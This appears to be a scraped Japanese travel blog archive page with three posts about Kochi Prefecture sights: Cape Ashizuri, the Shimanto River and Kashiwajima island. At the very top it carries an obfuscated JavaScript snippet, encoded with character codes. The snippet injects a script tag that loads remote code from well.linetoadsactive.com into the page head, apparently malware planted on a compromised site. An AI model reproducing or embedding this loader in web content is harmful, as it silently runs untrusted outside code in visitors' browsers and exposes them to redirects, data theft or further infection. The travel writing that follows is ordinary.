Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,119,101,108,108,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); 4.四国 |

Category Archives: 4.四国

comment(0)

地球がパノラマに広がる足摺岬~高知県オススメ観光スポット

足摺岬は四国の高知県の最南端に位置し、荒ぶる波と奇岩が多い岬として有名。高知龍馬空港から車で約2時間強。交通手段は車または観光バス巡りがメインで、今回はレンタカーを利用して訪ねてみた。訪問時期はコロナが一段落ち着いた(2020年)8月頃。  ■足摺岬の由来 足摺っていうのは足で地駄場を踏むという、悔しがる、ガッカリの感情を表現する行為。名称の由来は色々あるが、昔はこの岬でたくさん感情を表現するシーンがあったんだろうかね。 ■展望台 灯台の隣にあって、灯台と太平洋をセットでパノラマに眺める好位置。四国最南端のこともあって、太平洋を一望でき、地球はまん丸になってるんだなと再感動したよ。 太平洋はすごいなって感心してしまう。 遠浅の波がない海も有れば、白波と怒涛の音を立て、荒ぶるような黒い海もある。母なる海は無常なる変幻の顔を持っている。 ■足摺岬の灯台 少し古めな白い灯台。登ることはできないが、灯台直下を一回りできる。 ■弘法大師の七不思議 灯台ビロウ沿いの歩道には弘法大師にまつわる七不思議が解説付きで置かれている。 大師が爪で引っ掻いて書いた経文やコロンコロンと地下に落ちる地獄の穴、亀呼び場など。解説を読みながら想像力を働かせると楽しいよ(╹◡╹) でも実は7つではなく、少し遠く離れた所にも数個存在しているそう。余裕があったら巡ってみてね。 ■金剛福寺〜第38番札所 足摺岬まで来たらすぐ隣の金剛福寺も必ず見ておきたい。足摺岬とのゆかりがあるこのお寺のご本尊は千手観音様。境内にある観音像は圧巻。弘法大師像もあるので、必ず見ておくと良い。 ちなみに遍路区間(37番〜38番)がもっとも長いことでも知られている。山道のせいもあるけど、ドライブでも結構運転したなって思う。 ■感想 足摺岬のダイナミックな海岸に圧倒された。静かな海もあればここのように太平洋に面してて、強風に荒波の海もある。 お遍路さんの札所は此処が四国の一番の難所。今では多少プチ遍路とかもできるようになったけど、お遍路さんはこの道のりをずっと歩いて踏破したんだから感心してしまう。途中にお遍路さんを見かけるのも四国ならでは。 此処は普段ではなかなか来れない場所だから、沿道に高知県の桂浜とかの観光地と抱き合わせで巡るのが良いなと思う。 【LifeIsTravels.com専属ライター Shin】 本サイトのトラベルライターです。東南アジアやリゾート地が大好きで世界を飛び回る商社マン。忙しい日々に暇を見つけては旅に出ています。多感な乙女座男子で、旅の現地のモノ、コトを中心に発信していきます。よろしくお願いします。

Read more
comment(0)

日本最後の清流〜自然豊かな四万十川~高知県夏旅記

煌々ときらめく真夏の太陽から干からびないように、2020年8月、GoToトラベルキャンペーンを利用して、日本最後の清流に癒しを求めて四万十川を訪ねてみた。 旅は完ぺきを目指すより、多少の不満足を残すと良い。それが人生における心を豊かにすることでもある。悠々と流れる川を見ると、実はそうなのかもしれない。 高知県の代名詞といわれる四万十川は本当に夏の清涼剤だよね。 ■四万十川は実はそれほど水質よくない?! 高知県西部に流れる全長196km、四国内の一級河川で、最長の川である。ダムの建設がない、自然に任せた流れのため、名水百選、日本の秘境に選ばれている。と言われている。とはいうものの、実は政府による水質研究では全国の対象河川と比較しても水質は全国的に平均であり、さほど秀でているということではないことがわかった。 まぁそれでも豊かな森に囲まれ、雨水を受けて自然になままの豊富で新鮮な水源は気持ちの良いもの。 ■四万十川の名物、沈下橋 大小含めて四万十川には47つの沈下橋がある。これは欄干やレール等のものが付いていない橋。一番古いものは30年前に造られたそう。川を渡るために作ってあるため、川が上昇したら、橋が川に隠れるしくみとなっている。古来からの山々や川の住民の、自然や剛に逆らわず、あるがままに生きることがよくわかる。昔ながらの人々が自然に抵抗なく、共に生きる知恵を知ることができる。  ■四万十川舟下り ひとり2000円。屋根付きタイプなら日焼けなくていいね。青々しい山々と清らかな四万十川を眺めてくだっていくのは気持ちいい。 ■ 中村プリンスホテル宿泊 市内から少し離れるが、四万十川沿いで、朝夕ともに素敵な四万十川を鑑賞できた。 よくある落ち着いた街1番のホテルです。 ■鮎が絶品 四万十川と言ったら、鮎が有名。 清流に育てられた鮎はきっと絶品だ。 近くの居酒屋で注文したら生きがよくて、普通にデカイ!鮎もプリプリででかい! しかも卵入り。 ■四万十川感想 最後の清流と言われるだけあって、夏日の思い出に残る心の景色となった。蝉が鳴き、川がせらせらと流れ、心がとても落ち着いた。日本の懐かしい風景である。

Read more
comment(0)

高知県・柏島に行ってきた~四国のもっとも透明な海

柏島とは 柏島とは、高知県の最西端にある2つの橋で繋がれた出島のことであり、四国の海はここが一番綺麗だと言われている。 四国には綺麗なビーチのイメージがないから、どんなもんだい〜と思って行ってみたら、、、あらま、ビックリ!さすが綺麗! ■川のような海 エメラルドグリーンのような、まるで川だと錯覚、、、。海水を少し舐めて確かめたくらいだから(*´-`)。 足場が多く、ゴロゴロしているけど、浅いところでバタバタしてもいいし、深みもあるから、シュノーケルしても楽しい。 夏場に行ってきたので、早速、シュノーケルをしてみた。 かずに海中でじっとしているサヨリもいれば、橋下の石場に隠れるカラフルな魚も少しいた。 ■橋が二つ 四国本島から島に渡来してくる橋とその島に住んでいる地元住民が利用する橋の2つでつながっている。 古い橋が架けてある先は地元漁師のお家や民宿の群れ。 ■スイミングエリア 遊泳エリアは決まっている。 バーベキューやテントに面した河原の石ゴロエリアと橋を越えた斜向かい側にある砂浜ビーチ。 石ゴロエリアにいるとホントに河原にいるのかと錯覚してしまうくらい、川の色は水々しい清流のエメラルドグリーン。 砂浜ビーチの範囲は小ぶりだけど、きめ細かいサンドで、波も強くないからお子様にも安心。 ※飛び込み厳禁 近年まで橋の上から飛び込んで遊ぶ人もいたけど、現在は禁止されている。 橋から落ちるところがそれ程深くないため、下手したら怪我してしまうから。 ■駐車場料金 駐車場は一律500円(夏場8月行った時の情報)。 地元の方などが止めている無料の駐車スペースも発見したけど、数台しかないうえに狭いから大人しく有料駐車場に入れましょう。 ■行き方 高知県の最西端にあるから、高知龍馬空港からはレンタカーで向かうのが一番効率的。 所用時間は高速使いながら片道約3時間かかる。  ■途中通過の道の駅 2、3時間かかるので、休憩なり寄り道しながら向かう。 道の駅が豊富にあるからドライブしながらその地の名産品を食べたり買ったりして巡ると楽しいよ^ ^ ■感想 四国一美しい海。清らかな川のような海で、ネット評判の通り、とても澄んでいて、感心してしまった。 高知県の端っこにあり、距離もあることから車がないと行けないけど、機会があれば行ってみる価値あり! 元は地元の漁師たちの船止の入り江として使っているけど、あまりにも綺麗でなので、観光客も訪れるようになった。 入り江になっていることから、遠浅ではないが、波が穏やか。お魚もいるので、シュノーケルもできるよ。 【LifeIsTravels.com専属ライター Shin】 本サイトのトラベルライターです。東南アジアやリゾート地が大好きで世界を飛び回る商社マン。忙しい日々に暇を見つけては旅に出ています。多感な乙女座男子で、旅の現地のモノ、コトを中心に発信していきます。よろしくお願いします。

Read more